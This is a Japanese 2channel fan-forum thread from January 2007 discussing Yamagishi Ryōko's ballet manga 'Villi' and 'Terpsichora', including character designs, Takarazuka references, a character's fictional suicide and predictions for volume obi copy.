274 :花と名無しさん:2007/01/10(水) 01:09:40 ID:???0
>>273
そだね。ライバル=美人が定番なのに、
美咲(だっけ?)は明らかに三枚目っぽい。
美人でサラブレッド、格段に有利なはずの舞が伸び悩む側ってのも新鮮。

275 :花と名無しさん:2007/01/10(水) 02:03:36 ID:???O
>>249
ワロタよ
女騙され過ぎ
ハンカチよりまず顔を洗って目をさませ

276 :花と名無しさん:2007/01/10(水) 02:21:37 ID:???O
ヅカファソなので舞のヅカ発言に衝撃…

ベルばら風のヅカイメージ図にはちょっとウケたw
やっぱりそうよね…的な。

277 :花と名無しさん:2007/01/10(水) 02:50:29 ID:???O
>>274
そだね。ライバル=美人が定番なのに、
茜(だっけ?)は明らかに三枚目っぽい。
美人でサラブレッド、格段に有利なはずの千花が自殺する側ってのも新鮮。

278 :花と名無しさん:2007/01/10(水) 05:27:58 ID:???0
松本隆は好きなんだけどこれはちょっとなーとオモタ>木綿のハンカチーフ

279 :花と名無しさん:2007/01/10(水) 08:31:19 ID:???O
妖精王のアニメは05年の年末にBS2で放送してたよ。

280 :花と名無しさん:2007/01/10(水) 09:12:55 ID:???0
>>273-274
2回立ち読みしただけだけど、ヴィリ娘が美少女だとは思っていなかった。
あれ、美少女がやつれていただけなのか。
たしかに、水樹ちゃん系の目ではあるが・・・。

281 :花と名無しさん:2007/01/10(水) 09:43:13 ID:uk/265OT0
>>272
うん、聞いた事ある。男役になった人だよね。
ダンスがうまくて男役というのはいい選択肢かもしらん。

声楽というのは高校くらいになってから志しても充分選べる道
っつーか、小さい頃から歌の訓練した子よりも、高校の選択音楽で
たまたま先生に見いだされて、ちょっと訓練したら芸大声楽受かりました
というくらい天性の才能の方が大事らしい。

282 :花と名無しさん:2007/01/10(水) 10:37:24 ID:???0
ビリ読んだ。
もうギシ先生はP16くらいでビシっと決める神力がなくなったのかな〜
あと、チカちゃん以外の美少女絵がもう描けなくなったのか?
娘はスタイルいいけど、やつれ線がなくなったとしても美人にはみえない。
ライバルの中三の子のエクボ顔も変だし、体系もふとみ系ガッシリで、
とても今が一番綺麗な時期とは…w。
母娘でIT社長争って、負けたほうが奈落つかって相手をあぼーんって
単純な話にはならないとは思うけれど。
服の趣味は同世代のベテラン女性漫画家と比べて、やっぱセンスいいね。


283 :花と名無しさん:2007/01/10(水) 10:44:11 ID:uk/265OT0
>>282
服の趣味って、登場人物の服の趣味?
アシさんか担当さんに依頼してるのでは?

ご本人が和装趣味のおばさま作家には最近の若い子のファッションわけわけめでしょ。

284 :花と名無しさん:2007/01/10(水) 10:58:46 ID:NeHGF2hjO
わけわけめ

285 :花と名無しさん:2007/01/10(水) 11:26:11 ID:???0
>>262
1部がマンガで2部が小説なんて認めん。
というか、あの2部は二次みたいなものじゃないか?
本筋を進めないで、設定上で遊んでいる。

このへんで棟梁スレに帰る。愚痴を言ってみたかったんだ。スマソ。

286 :花と名無しさん:2007/01/10(水) 11:32:51 ID:???0
>>282
>あと、チカちゃん以外の美少女絵がもう描けなくなったのか?

描けるとは思うけど、すごく時間がかかるんだと思う。
あと、それに伴う気力の消耗・・・
連載だと難しいんじゃないかな

287 :花と名無しさん:2007/01/10(水) 11:43:11 ID:???0
286だけどごめん、ちょっと言葉が足らなかった。
「チカちゃん以外の美少女」に限らず、美形の男女は、という意味で述べました。

288 :花と名無しさん:2007/01/10(水) 12:03:08 ID:???0
もしかして、チカちゃん描くと消耗するから、というのが、
チカちゃんアボーンの裏の理由だったのか!?w

289 :花と名無しさん:2007/01/10(水) 13:44:29 ID:???O
>>286
そういうのを「描ける」とは言わない。
なんか「やれば出きるけどやらないだけだ」と言ってるニートの言い訳みたい。

290 :花と名無しさん:2007/01/10(水) 13:45:44 ID:???0
今度は宝塚かw
宝塚がハードル高いってwwww
もう終わったな山岸

291 :花と名無しさん:2007/01/10(水) 13:58:07 ID:???0
>>289
連載は無理だとしても、イラストの仕事など、単発なら描ける
のだろうから、ニートの言い訳は言いすぎでは?

292 :花と名無しさん:2007/01/10(水) 14:05:34 ID:???O
>>291
漫画家は漫画描いてなんぼだからねー。
イラストは旨いんだけど…とか
連載時は雑だけどコミックスで時間かけて直せば…ていう漫画家ゴロゴロいるが。
要はギシもそのレベルに落ちたという事。

293 :花と名無しさん:2007/01/10(水) 14:09:23 ID:???0
>>253
コバルト文庫のシリーズで完結作品を見たことないのだが。
売れるうちはどこまでも引っ張る・人気がなくなったら後知らね、
って、阿漕な商売ですね。

294 :花と名無しさん:2007/01/10(水) 14:09:38 ID:???0
ヴィリやっと読んだ。
娘微妙な顔なのはクォーターだからなのね。
丸顔にしては微妙にエラっぽい感じがしてたから。

ドレスの相手はIT社長でなく自分は父親あたりだったりしてと思った。
父親日本人とのハーフなんだよね。日本にいてもおかしくない。
何かのきっかけで再会して、バレエで行き詰ってる相談してるとか。
稽古に遅れてきたのも父親にこっそり会っていたのかなーと。

しかし「宝塚」ってストレートな単語にはびっくりした。
○○歌劇団(あの有名な…)とかなら今まで通りありそうだけど。

295 :花と名無しさん:2007/01/10(水) 14:23:17 ID:???0
トーン頭が主人公なの?あれは狂言回しかな。
母親?

296 :花と名無しさん:2007/01/10(水) 14:24:11 ID:???O
舞ちゃんのドレス、センスいいの?
ピンクゴールドの素敵なドレスって・・・

297 :花と名無しさん:2007/01/10(水) 14:34:15 ID:???0
>>295
金子ポジションかな?円さん嫌いじゃないけどね。


298 :花と名無しさん:2007/01/10(水) 14:35:06 ID:???0
>ピンクゴールドの素敵なドレス
ワタシ40代だけど、ステキとは思えなんだ。
ファーとリボン、どっちがメインなのか統一感がない、安っぽそう。

299 :花と名無しさん:2007/01/10(水) 14:39:46 ID:???0
ピンクゴールドというか携帯の色にあるピンクシャンパンゴールドって感じかなと思ったw
白っぽいベースにキラキラ金が光にあたって見える感じ。一歩間違えるとギャル服。

300 :花と名無しさん:2007/01/10(水) 14:50:51 ID:???O
あの首に下げてる鎖がやだな
金持ちっぽいけど品がないというか、千花ちゃんのおめかしルックのほうが良い

301 :花と名無しさん:2007/01/10(水) 14:58:17 ID:???0
だってあのオバちゃんいい年こいて恋に恋するいっちゃってる人っていう設定でしょ。

いるよああいう勘違い系

302 :花と名無しさん:2007/01/10(水) 16:39:00 ID:???0
ヴィリ、これから段々盛り上がってきそうなのに、
水を差すような書き込みが多いね(^_^;)

303 :花と名無しさん:2007/01/10(水) 17:03:59 ID:???0
>>269
多少、ストーリーは端折ってた気がしないでもないが、よくできてたと思う。
声優さんもいい感じですた。

304 :花と名無しさん:2007/01/10(水) 17:38:08 ID:???O
>>301
うちの職場には20くらいの子供いる40いってるおばさんだけど
子供とかわらんファッション、恋人つくったりまだまだ謳歌してるよ

305 :花と名無しさん:2007/01/10(水) 18:09:02 ID:???0
5年ぶりに劇団に戻りたいって子はどうなるんだろ。
これって世代交代の話もありなのかな。
カーチャンはジゼルを満足できる出来で踊りきって女の幸せ取るとか。

306 :花と名無しさん:2007/01/10(水) 18:09:42 ID:???0
>>305
劇団じゃなくてバレエ団か。
主催者がトップで上がつっかえてるって聞く話だもんなぁ。

307 :花と名無しさん:2007/01/10(水) 18:17:30 ID:???0
復刊ドットコム『妖精王の帰還』復刊決定ってメールきた。
昔買って持ってるんだけど

>・カラー未発表作品も追加収録予定!
これが気になる…。

308 :花と名無しさん:2007/01/10(水) 19:49:08 ID:???O
楽しみだね

309 :花と名無しさん:2007/01/10(水) 22:10:30 ID:???0
>>278
「木綿のハンカチーフ」は松本隆が太田裕美に
「ぼく」と言わせ/歌わせたくて作った歌でもある。
当時松本と太田には、そーゆー関係アリ。

310 :花と名無しさん:2007/01/10(水) 23:31:09 ID:???O
「そーゆー関係アリ」という表現が当時っぽいなw

311 :花と名無しさん:2007/01/10(水) 23:54:28 ID:???0
 このスレに書き込んでいる人たちは
どうやら同世代っぽいw

312 :花と名無しさん:2007/01/11(木) 00:37:31 ID:???0
チカも山岸マンガ的にはそれほどものすごい美少女の位置付けじゃないような
気がするが、大人トジコ並に進化しつつある途中でああなったみたいな感じで。
 しかしこれがファンの欲目と言うヤツか。
茜も今回のエクボの子もマンガだとすごい顔に見えるけど、実際に普通に
いるよねこういう子って感じで面白いと思う。ちょっとエラはった描写
もリアルだと思うけどなぁ。でも実際のハーフの人はエラはり少ないような気
がする
むしろ顔長すぎアゴ細すぎのタイプのがありがちなような気がするがしかし、
外人的にはある程度アゴしっかりしてる顔の方を好むから、荒川静とか、あの
系統の東洋人顔が持てるんだと思ってた。
 しかし、少女マンガとは美を求めて読むものなんだなぁとこのスレ見て改めて思った。

313 :花と名無しさん:2007/01/11(木) 00:37:32 ID:???0
309は50代に10000000つもりだ

314 :花と名無しさん:2007/01/11(木) 08:42:30 ID:???0
千花の美しさは刀自古にも負けんばい

315 :花と名無しさん:2007/01/11(木) 10:41:53 ID:???O
チカは先生の調子次第で
美少女にも半魚人にもなります

316 :花と名無しさん:2007/01/11(木) 13:05:59 ID:???0
十巻はいつ発売ですか?

317 :花と名無しさん:2007/01/11(木) 13:24:58 ID:???0
>>316 >>1

318 :花と名無しさん:2007/01/11(木) 14:17:08 ID:???0
>>315
ワロタw

319 :花と名無しさん:2007/01/11(木) 14:18:50 ID:1VBoaB2k0
クォーターネタなんて先生ったら、「まいあ」意識してる?
頼むから有吉みたいな無国籍漫画にしないでね。

320 :花と名無しさん:2007/01/11(木) 14:20:28 ID:???0
アマゾンには1/23発売って書いてあったお

321 :花と名無しさん:2007/01/11(木) 15:45:05 ID:???0
あ、今日は11111の日じゃないか!
つか11:11分に書き込みできなくて残念。

322 :花と名無しさん:2007/01/11(木) 15:46:02 ID:???0
ヴィリあらためて読み返したら娘の留学話の時に母親が心の中で
「私の二の舞はさせたくない…」みたいな事書いてあった。
確かあのお教室は母親のそのまた母親から引継いだんだよね?
若い時は娘と同じような状態にあって留学して母から逃れたら
うっかり男にはまってしまったってオチなんだろうか。

テレプシでも出てきたバレエ海外留学はメリットもあるけど
運悪く潰れる場合もあるって話も絡めてるのかな。
今度ドイツから戻ってくる若手さんも含めって。

323 :花と名無しさん:2007/01/11(木) 16:23:29 ID:???0
向うのバレエ団行って日本人ってことで解雇ネタは、
中村○子さんの話ですかね?

324 :花と名無しさん:2007/01/11(木) 18:01:05 ID:???O
うっかり男といえば、なんといってもオマロ
トジコに失言した従兄弟だよね

325 :花と名無しさん:2007/01/11(木) 21:06:30 ID:???0
今月のヴィリの影響で宝塚に興味持ち始めた人がいる?
>おすすめ2ちゃん

ダンス板の山岸スレ落ちちゃったね。無念。

326 :花と名無しさん:2007/01/11(木) 21:08:29 ID:???O
山岸バレエマンガを崇拝するところ[5巻目]
http://hobby9.2ch.net/test/read.cgi/dance/1160123242/

327 :花と名無しさん:2007/01/11(木) 22:36:33 ID:???0
>>326あれ?まだあったね。
さっき見たら過去ログ倉庫に保管されてますって出たのに。

328 :花と名無しさん:2007/01/11(木) 23:15:56 ID:???0
>327
鯖移転だよ。
2ちゃん全体で相当動いてるから。

329 :花と名無しさん:2007/01/12(金) 02:03:30 ID:???0
今「まんが残酷グリム童話」を読んでる途中なんだけど食傷気味。
これ企画自体はいいのに、作家が酷すぎるよ。
もっと実力ある先生方に頼んだら名作だったのに。
ギシ先生にサラっと一遍、他有名作家陣に頼んで欲しかった。

330 :花と名無しさん:2007/01/12(金) 06:34:51 ID:???0
ヅカネタは扱いがむずかしいぞw
海外では総スカンの学芸会集団なんて絶対描けないし。

331 :花と名無しさん:2007/01/12(金) 07:15:55 ID:???O
かといって学芸会以上だと書くわけにもいかないしね……

332 :花と名無しさん:2007/01/12(金) 07:56:43 ID:???0
>>329それって金瓶梅を連載してる雑誌?あとやたらセックルシーンがあるマンガ?
あれは何年もやってるとやっぱり作家さんもネタ切れになっちゃうんじゃないかな。
最初の頃は面白かった気もするし。

333 :花と名無しさん:2007/01/12(金) 11:25:06 ID:???0
ヅカのレビュー見るとロケット(ラインダンス)で太い子がいるなぁと驚く時がある。
よく考えるとまだまだ成長期の子達だし、年数重ねるとだんだんしまってくる。
何にしろバレリーナ程細くなくてもいいなだろうなとは思う。
10代で入るから背が思ったりよ伸びなかったり男役なのに思いっきり女顔だったり
色々成長で問題は残る場合がある。男役から女役なんて人もいるしね。

334 :花と名無しさん:2007/01/12(金) 11:41:11 ID:???O
まぁヅカだしね〜。片手リフトがあるわけじゃないし、多少太くてもw

335 :花と名無しさん:2007/01/12(金) 12:08:31 ID:???0
片手リフトはないが、男役(女)が女役(女)をリフトするんだから太いのは困るよ。

336 :花と名無しさん:2007/01/12(金) 14:11:49 ID:???O
舞がヅカとか言い出した時から予想してたけど、
バレエヲタとヅカヲタの貶め合いの予感w

ギシスレはこれでなくてはな

337 :花と名無しさん:2007/01/12(金) 14:44:02 ID:???0
>>332
「金瓶梅」かどうかわかんないけど
セクロスとグロが必須っぽいやつだからたぶんそうだろうね。
最初の頃の方が良かったの同意。
最後の方みたことも聞いたこともないグロ作家?だらけ。
だんだん絵の下手具合に笑うしかなくなってくる。

338 :花と名無しさん:2007/01/12(金) 15:16:28 ID:???0
■ 閉鎖です
http://ex14.vip2ch.com/test/read.cgi/news4vip/1168579539/

1 ひろゆき@どうやら管理人 ★ New! 2007/01/12(金) 14:25:39.60
もう疲れたです。

来週で終了ということで。


17 FOX ★ 2007/01/12(金) 14:28:03.56 ID:???
おつかれさん。

鯖の契約解除の準備してきます


111 ひろゆき@どうやら管理人 ★ New! 2007/01/12(金) 14:32:30.16 ID:???
せめて軽自動車くらいは勘弁してほしいです。。

339 :花と名無しさん:2007/01/12(金) 15:42:36 ID:???0
すげー祭りになってるな。ニュー速。

ヅカかぁ。
親レールアリの子供の不幸やそこからの脱出(もしくは脱出失敗)を書きたいのかな。
チカ死んじゃったし、ふとみネタ引っ張れないから
短編でやりたいことやっちゃえーみたいに。

あのITと娘くっついたら鏡よ鏡の焼き直しだよなぁ。
でも家から逃がすためにはヅカはいいのかもな。



340 :花と名無しさん:2007/01/12(金) 16:43:29 ID:???0
2ちゃん閉鎖は釣りだと思ってるんで・・・。
でもこんだけ祭りになると不安だなw

ヴィリって美少女が美少女に見えない。何あの白キャラレベルの美少女。

341 :花と名無しさん:2007/01/12(金) 17:20:54 ID:???O
いつものパターンと思うけど
祭は好きなんで信じてみるw
楽しいよ祭

342 :花と名無しさん:2007/01/12(金) 17:59:47 ID:???0
うむ。
現実の祭は人混みが苦手なのでダメだが
2chの祭は好きだ。

久しぶりにトップを見に行ったら、壺が差し押さえ食らってるw

343 :花と名無しさん:2007/01/12(金) 19:19:01 ID:???0
来月のテレプシ特集が楽しみだ。
山岸先生のインタビューもだけど
バレエダンサーに誰が出るかとか
実際に衣装を作ってみるというのが一番見たい。

344 :花と名無しさん:2007/01/13(土) 12:19:54 ID:???0
実際に衣装を作ってみる!それは楽しそうだね。
空美のブルーバードも自作っぽかったしね。

つか空美が美智子先生のレオタード借りたときにユルユルだったのがやっぱり
納得いかないな。

345 :花と名無しさん:2007/01/13(土) 16:16:15 ID:???0
>>344
ユルユルが納得いかないのってなんで?

あれって、レオタードが古いって事と、クミがまだこれから
成長するってことだと思ったのだが。

346 :花と名無しさん:2007/01/13(土) 17:30:18 ID:???0
おしゃれなピンクゴールドのドレス

すごいケバそうな服なんですけど、ああいうレベルのお金持ちだと
ジーパンNG→いきなりパーティ級のドレスで
中間レベルの服をもってないんでしょうか

347 :花と名無しさん:2007/01/13(土) 18:54:59 ID:McD0UvQI0
サテンなら毛爆破内。
上品な感じ。

348 :花と名無しさん:2007/01/13(土) 18:56:14 ID:???0
流行りのあんまりピカピカしてないタイプの
ピンクゴールドじゃないのかな。

母親の服装をみてドレスで行ったんじゃない。

349 :花と名無しさん:2007/01/13(土) 19:03:26 ID:???0
>中間レベルの服をもってないんでしょうか

高い服はITから貢がれた者しかないとみた。

350 :花と名無しさん:2007/01/13(土) 20:09:44 ID:???O
「ヴィリ」のタイトルから妄想すると
結婚の約束をしたITが急死。ITの金に魅かれて始まった恋だが、礼奈が事の重大さに気付く

351 :花と名無しさん:2007/01/13(土) 20:33:54 ID:???0
http://www.youtube.com/watch?v=nZMCCKBFk0Y

チカちゃん……

352 :花と名無しさん:2007/01/13(土) 21:59:29 ID:???0
ひさしぶりにアラベスクを読んだ
ガイシュツだろうけど
今読むと馴染みないバレエ学校の教室に夜中に隠れてるミロノフ先生は変だ
ノンナに君が望む事はなにもしてやれないとかいいつつ最後本人の承諾もなく結婚する気なのにもワロタ
あといつノンナのこと好きになったのかもよくわからない
でもミロノフ先生22歳カッコヨス

353 :花と名無しさん:2007/01/13(土) 22:30:16 ID:???O
先生22歳なのか。
大人過ぎるわ。

354 :花と名無しさん:2007/01/13(土) 22:42:42 ID:???O
ラスト、実は先生は死んだんじゃないかと10%くらい思ってる

355 :花と名無しさん:2007/01/13(土) 22:59:27 ID:???0
自分は15%くらい死んでると思う。

356 :花と名無しさん:2007/01/13(土) 23:01:13 ID:???0
その発想はなかったわ

357 :花と名無しさん:2007/01/14(日) 00:05:40 ID:???0
ああ、わかる、わかる。

順調に回復してるように見えて、急死するミロノフ先生。
ミロノフ先生死亡と共に謎の心停止で殉じるノンナ。

あの世で踊る二人のポーズみたいにも見えるものね。

358 :花と名無しさん:2007/01/14(日) 00:34:05 ID:LiLwIxGI0
デスノートかよ

359 :花と名無しさん:2007/01/14(日) 00:55:28 ID:???0
そのデスノートを書いたのは……
ソ連最高責任者ブレジネフ(当時)かな?

360 :花と名無しさん:2007/01/14(日) 11:11:34 ID:???O
短編つまらん。
普通、短編って言ったら前後編とかじゃないの?
なんで連載になってんのよ。
連載中のものがあるんだから、さっさとテレプシ書けばいいのに。

361 :花と名無しさん:2007/01/14(日) 11:44:14 ID:???0
まあ初期から中期までは傑作と呼び名高かったテレプシが
gdgdになっちゃって迷走して色んな人から
駄作とか批判されて迷走しちゃったからなあ
ちょっと辛いんじゃない?描くの
ま本人は評判気にしてないかもだけど
連載終わったあとなら評判を耳に入れた可能性もあるね
これ以上老醜晒す前に得意の短編でもいいと思う

362 :花と名無しさん:2007/01/14(日) 11:46:48 ID:???0
迷走が2回入ったorz

363 :花と名無しさん:2007/01/14(日) 12:26:18 ID:???O
信者がアンチになる瞬間だな。

364 :花と名無しさん:2007/01/14(日) 12:43:36 ID:???0
短編ってどれくらいの長さなんだろ。
ヴィリは来月で終わらないみたいだから
4回目もあるんだろうね。

365 :花と名無しさん:2007/01/14(日) 13:00:21 ID:???0
五月号から第二部再開というのを見た気がするんだけど……

夢だったかな?神のお告げ?w

366 :花と名無しさん:2007/01/14(日) 13:01:53 ID:???0
>>360
ダビンチ側は、短編とは言ってないような気が。
ダビンチには短期集中連載と書いてあって、
それをこのスレで、短編が何本か載るのかな?と受け止めたんじゃなかった?

367 :花と名無しさん:2007/01/14(日) 14:46:30 ID:???0
短期集中連載というと白眼子くらいの長さかなーと思う。

368 :花と名無しさん:2007/01/14(日) 14:57:01 ID:???0
>>365-3666
馬屋古の例もあるし…

先生「構想広がっちゃったからのびます。ヴィリ」
編集「そんなー」

かも

369 :花と名無しさん:2007/01/14(日) 15:02:12 ID:???0
>>368
むしろテレプシがそんな気が……

370 :花と名無しさん:2007/01/14(日) 15:35:11 ID:???0
>361
テレプシ後半のできを山岸先生どう思ってるんだろう。
インタビューで語ってくれるんだろうか。
ベテランなんだし他人の批判を気にして
話が作りづらいとは思えないな。
実はけっこう気にしてるのかも知れないけど。

371 :花と名無しさん:2007/01/14(日) 15:58:32 ID:???0
気にしてるでしょ
だって 「チカちゃんのことミンナゴメン」ってこま外に書いてあったよね
多分ギッシー先生も迷ったんじゃないかな?
毛人とウマーの最期のシーンみたいに

372 :花と名無しさん:2007/01/14(日) 16:00:03 ID:???O
旦那に理解がないと辛いな

373 :花と名無しさん:2007/01/14(日) 16:04:28 ID:???0
他人の批判が気にならない漫画家なんていないでしょ。

374 :花と名無しさん:2007/01/14(日) 16:19:19 ID:???O
本来ならば、溢れる才能をいかんなく発揮して
うんぬん
まぁ山岸先生の夢だな

375 :花と名無しさん:2007/01/14(日) 16:23:25 ID:???0
世俗や商業的な物から切り離して創作すると言う事を目標としつつ、
それらを捨てられない、どうしても気になってしまうのが24年組だよ。

376 :花と名無しさん:2007/01/14(日) 18:18:52 ID:???0
>>370
クミちゃんをもう少し長く出していられたらあの展開は変わったのかなぁ。
いずれにせよ、ユキちゃんが語り部という立ち位置を離れて、金子や富樫も
語り部を担当するようになってしまってから、今一な展開だなぁと思う。

登場人物の才能というのが、ふつーの読者に支持されるためには、代わりに
何か欠如していて欲しいわけで「ユキちゃんの目標であり最愛の人でもある
姉を失った」のをそれにあてるには、チカちゃんは読者の前で美しすぎて
壮絶すぎた。
妹が姉を失った喪失感を思うより、読者である自分がチカちゃんを喪失した
という哀しみにひたっちゃったしね。

引っ込み思案なシャイですぐ挫折感を表にだしちゃうユキが、その弱さを
かかえたまま、振り付けの世界だけでは大胆に自分をさらけだせるという
展開を期待していた者からの意見です。

377 :花と名無しさん:2007/01/14(日) 18:40:57 ID:???0
>チカちゃんは読者の前で美しすぎて壮絶すぎた。


このスレではずーっとそれ言われ続けてるけど、
自分はあんまりそうは感じないんだよな〜。
主人公の奇麗で可哀相なお姉ちゃんという位置づけ以上でも以下でもない感じ。

378 :花と名無しさん:2007/01/14(日) 19:04:27 ID:???0
377さんに同じく

379 :花と名無しさん:2007/01/14(日) 19:18:04 ID:???0
>>377-378
そっかー。
じゃ、「振り付けの才能」の描写に関してはどう思う?
それともそんなこともどうでもよくて、ギシせんせの作品だから
読んでます って人達?

380 :花と名無しさん:2007/01/14(日) 19:21:23 ID:???0
壮絶に美しい(ことになっている)姉を殺さずにユキも育って欲しかった。
姉が踊りで、妹が振り付けでといえばありがちかもしれないけど
だったらチカちゃんの欠点(感情表現、マイム)が苦手というのをどうしてあんなに丹念に描いたのかと。
(ユキちゃんの才能を示すためではあっただろうけど)
姉妹の葛藤は、どちらかが違う世界に行って自分をみつけることで解決することが多い気がするが
同じ世界に身をおきつつ、少しずつ違う形で、互いを認め合う形で二人で切磋琢磨して行って欲しかったの。

381 :花と名無しさん:2007/01/14(日) 19:23:50 ID:???0
>それともそんなこともどうでもよくて、ギシせんせの作品だから
>読んでます って人達?

はい?

382 :花と名無しさん:2007/01/14(日) 20:24:46 ID:???0
昨夜読み返したらワクワクしたのはクミが踊るシーンだった。
特に埼玉バレコンのブルーバード。

383 :花と名無しさん:2007/01/14(日) 20:49:19 ID:???0
山岸作品で壮絶に美しいのは王子だけだ。
私は血が見たいのだと言って木からぶらさがって笑うくせにエミシに葉っぱ
かけられただけでうふんと笑うんだぞ。

384 :花と名無しさん:2007/01/14(日) 21:05:54 ID:???0
>>380
>だったらチカちゃんの欠点(感情表現、マイム)が苦手というのをどうしてあんなに丹念に
そんなに丹念だったかなあ。
くるみのひとつのエピソードでしかないでしょ。くるみ以外であったっけ?

むしろ怪我して踊れなくて精神を病んで行く様が丹念に描かれてたと思うけど。

385 :花と名無しさん:2007/01/14(日) 21:53:11 ID:???0
>>380
>だったらチカちゃんの欠点(感情表現、マイム)が苦手というのをどうしてあんなに丹念に描いたのかと

私は、あれはチカちゃんの欠点というより、
イジメがどんどん酷くなっていってそれに屈しまいとして、自然な感情表現を
表に出すことを拒否してしまってる兆候ととったからなぁ。
初めての時は大げさになりがちなのに....と鳥山センセが言ってたし。

386 :花と名無しさん:2007/01/14(日) 23:07:49 ID:???0
おお 鋭いですね>385

387 :花と名無しさん:2007/01/14(日) 23:21:18 ID:???0
マイムは、六花の表現力の豊かさを
表現するためかと思ってたわ

388 :花と名無しさん:2007/01/14(日) 23:54:25 ID:???0
>>385
バレエ技術をそつなくこなすから、そのノリ(つーのも変だが)で
マイムも淡々とやってしまうだけだと思ってた。

389 :花と名無しさん:2007/01/15(月) 00:06:54 ID:???O
マイムをそつなくこなすナッキー想像した。
悪たれ団の←これ、なにが垂れてるんだろね

390 :花と名無しさん:2007/01/15(月) 00:13:51 ID:???0
あくたれ-ぐち 【悪たれ口】<

わざわざ相手を怒らせるように言う言葉。憎まれ口。あくたれ。
「―をたたく」


あくたれ 【悪たれ】<

(1)憎まれ口をきいたり、乱暴をしたりして人に嫌がらせをすること。また、その人。
「―小僧」

(2)「悪たれ口」に同じ。

391 :花と名無しさん:2007/01/15(月) 00:15:26 ID:???0
悪口を垂れるの、動詞と目的語の入れ替えが「悪たれ口」
悪たれ口をする人を「悪たれ者」そいつらの団が「悪たれ団」


てかナッキーって古いなwww

392 :花と名無しさん:2007/01/15(月) 08:02:35 ID:???0
まぁ反抗期の厨房団(それを宣言)って事でしょうw<悪たれ団
しかしクラス全体がナッキーの影響で俺達だって悪たれ団発言。先生カワイソス。

393 :花と名無しさん:2007/01/15(月) 08:28:04 ID:???0
何故流れがナッキーなのかさっぱりわからない。

394 :花と名無しさん:2007/01/15(月) 10:51:10 ID:???0
てか、ナッキーって誰?

395 :花と名無しさん:2007/01/15(月) 13:50:59 ID:???0
気にすんな。
君が生まれる前の話だ。

396 :花と名無しさん:2007/01/15(月) 13:52:02 ID:???0
障子スレ行けば良いと思うよ。

397 :花と名無しさん:2007/01/15(月) 14:03:24 ID:???O
このスレ、クリスマス前に立ってたんだ!
そんで三週間以上経つのにまだ400もいってないんだね。
千花ちゃん祭りが嘘のようです。

398 :花と名無しさん:2007/01/15(月) 14:16:22 ID:???0
障子スレもわからん。orz

399 :花と名無しさん:2007/01/15(月) 14:29:27 ID:???O
ヴィリがつまんないからね…
何つうか、感想すら出てこないつまんなさなんだよなぁ
自分にとっては
久しぶりのテレプシ以外の作品で期待してただけに
そういえば、暮れ頃に
うちの県のローカル新聞にテレプシの漫画評が描かれてたんだけど、
チカちゃんの死(記事には、姉のショッキングな出来事とか書いてたかな)は、
漫画界ではこの夏、この話題で持ちきりだった、とあった
評を書いた人も一回くらい、ここの祭に参加したのかなてオモタ
しかし、漫画評論家とは羨ましい職業
それだけで食ってるわけではないんだろうけど

400 :花と名無しさん:2007/01/15(月) 15:30:48 ID:???0
ナッキーは「生徒諸君!」by庄司陽子の主人公。
自分は読んだことないから、内容は聞かないでねw

401 :花と名無しさん:2007/01/15(月) 16:08:15 ID:???O
初音ちゃん強姦ネタのとき、2ちゃんがあったら祭になっただろうな…

402 :花と名無しさん:2007/01/15(月) 17:07:39 ID:???0
>>400
ありがd

403 :花と名無しさん:2007/01/15(月) 17:42:11 ID:???0
検索したら『生徒諸君!』の連載が自分の産まれる前のことだったので、ナッキーを
知らないのも無理ないかと納得しました。いい機会だから手に取ってみます。

404 :花と名無しさん:2007/01/15(月) 18:24:14 ID:???0
10巻入りのボックスが出るって事は、千花ちゃん自殺まで10巻に入るのかな?

405 :花と名無しさん:2007/01/15(月) 18:26:03 ID:???0
>402
沖田君の遭難の時もきっと…
しかし、なんで千花ちゃんがナッキー? マールが六花ちゃんてこと?
って、平均年齢高そうなギシふぁんならではのやりとりだなあ。

406 :405:2007/01/15(月) 18:26:57 ID:???0
スマン。上のは>>401宛て。

407 :花と名無しさん:2007/01/15(月) 18:52:02 ID:???O
しかし何だな。千花の顔って一昔前なら、気が強くプライド高いor意地悪いって感じなのにな。少女マンガも変わったなぁ

408 :花と名無しさん:2007/01/15(月) 19:31:13 ID:???0
千花の顔ってアラベスクであっさり女優になっちゃった
天才少女ラーラに似てる。

409 :花と名無しさん:2007/01/15(月) 19:36:37 ID:???0
まあ千花はあっさり逝っちゃいましたが。

410 :花と名無しさん:2007/01/15(月) 19:50:15 ID:???O
>>404
そうなると、帯のコピーは何だろね
あれっていつも、作中のセリフから取ってたっけ?

411 :花と名無しさん:2007/01/15(月) 20:26:17 ID:???O
最初の方はセリフじゃなかったよ。
「コンクール開幕!」とか。
セリフになったのは、ユキがクララやり始めた頃じゃなかった?
どっかにまとめたんだけど無くしてしまった…

412 :花と名無しさん:2007/01/15(月) 20:46:55 ID:???0
>>407
妹思いで、親のお手伝いをよくやって、バレエ以外にお勉強もちゃんとして
礼儀正しくって....そのあたりで、夭逝の可能性に気づいておけばよかったなぁ。

せめて事故で亡くなって欲しかったよ。どうせ死なせるつもりだったのならさ。
姉がバレエを続けられなくなっていきそうな苦悩から自殺への道が、妹の芸の
肥やしって、作者の妹贔屓も勘弁してほしい。
口直しにビデオにとっておいた「ふたり」でも見ようっと。

413 :花と名無しさん:2007/01/15(月) 21:02:48 ID:???0
>410
千花の作中のセリフだったよ。
超うろ覚えだけど
バレエのできない私は価値がないみたいな。
…が2ヵ所あったやつ。

414 :花と名無しさん:2007/01/15(月) 21:03:59 ID:???0
10巻帯予想
「おばあちゃんが死んではいけないと言った気がした」

415 :花と名無しさん:2007/01/15(月) 21:12:11 ID:???0
1巻 生きることは、舞に似ている。
2巻 わたしもバレエが踊りたい
3巻 バレエコンクール開催!
4巻 バレエコンクール結果発表 <>
5巻 「くるみ割り人形」運命の幕が今、開く!
6巻 千花、入院 六花、受験 そして…
7巻 神さま!千花ちゃんの怪我を治して下さい
8巻 不安になったら笑顔になるといい
9巻 天才だけがバレエを踊ってるんじゃないもの

416 :花と名無しさん:2007/01/15(月) 21:22:23 ID:???O
>>415
すごい
ありがとん
やっぱり9巻のコピーいいね
バレエをやってなくても、しみる
ダビちんの人が、コピー考えてるのかな

417 :花と名無しさん:2007/01/15(月) 21:27:30 ID:???0
予想「私、またバレエを踊りたい」

418 :花と名無しさん:2007/01/15(月) 21:38:45 ID:???0
10巻のコピーはもう出てるんだから
予想もないと思うが。

419 :花と名無しさん:2007/01/15(月) 21:45:25 ID:???O
>>418
>>413が言ってたのはそのことだったのね
失礼しますた

420 :花と名無しさん:2007/01/16(火) 13:20:33 ID:???0
表紙は10巻が一番好き


421 :花と名無しさん:2007/01/16(火) 14:02:11 ID:???O
10巻帯
踊れない
わたしは……
何の価値も
ない……?

